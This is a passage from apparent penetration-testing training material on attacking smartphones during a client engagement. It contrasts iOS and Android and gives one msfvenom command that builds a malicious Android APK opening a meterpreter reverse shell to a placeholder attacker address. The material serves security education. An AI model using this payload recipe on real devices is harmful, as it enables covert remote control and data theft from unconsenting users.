Mobile devices, particularly smartphones and tablets, are an important tool in many organizations. In today's world, an employee's mobile device might be just as attractive to an attacker because it can hold sensitive company data and private personal data, not to mention its usefulness as an authentication mechanism. Therefore, it may be in your interests to test the client's mobile workforce and infrastructure for weaknesses, particularly to malware.

The approach you take will depend heavily on the mobile platform that devices are using. The iOS platform is more restrictive and therefore has fewer opportunities for exploitation. By default, iOS devices can only install apps from the official App Store, which itself has some measure of quality control to keep malware out. Nevertheless, malware has made its way onto the App Store on several occasions. The jailbreaking process enables devices to install apps from third-party sources, so you might be able to leverage social engineering tactics to get users to install malware.

The Android OS is usually a better bet when it comes to exploiting mobile devices. Android is much less restrictive than iOS by design, and a change of a single setting can make it possible for the device to install apps from third-party sources. The rooting process reduces the device's security even further, enabling apps to run outside of their sandbox environments and assume high-level privileges, interacting with the kernel and other apps on the device. This can enable you to exfiltrate sensitive data, capture session information, and even leave a device non-functional.

The following example uses a tool called msfvenom, part of the Metasploit Framework, to create a malicious app package for Android devices:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker IP address> LPORT=<available port> R > malware.apk

This creates a reverse TCP listener back to the attacker's machine and saves it as an app package, or APK file. APK files are the installation file format for Android. Assuming the user enables installation of apps from unknown sources, they simply need to run the installer to infect their device. Back on the attack machine, you can set up Metasploit to handle the incoming connection by, say, opening a shell onto the device.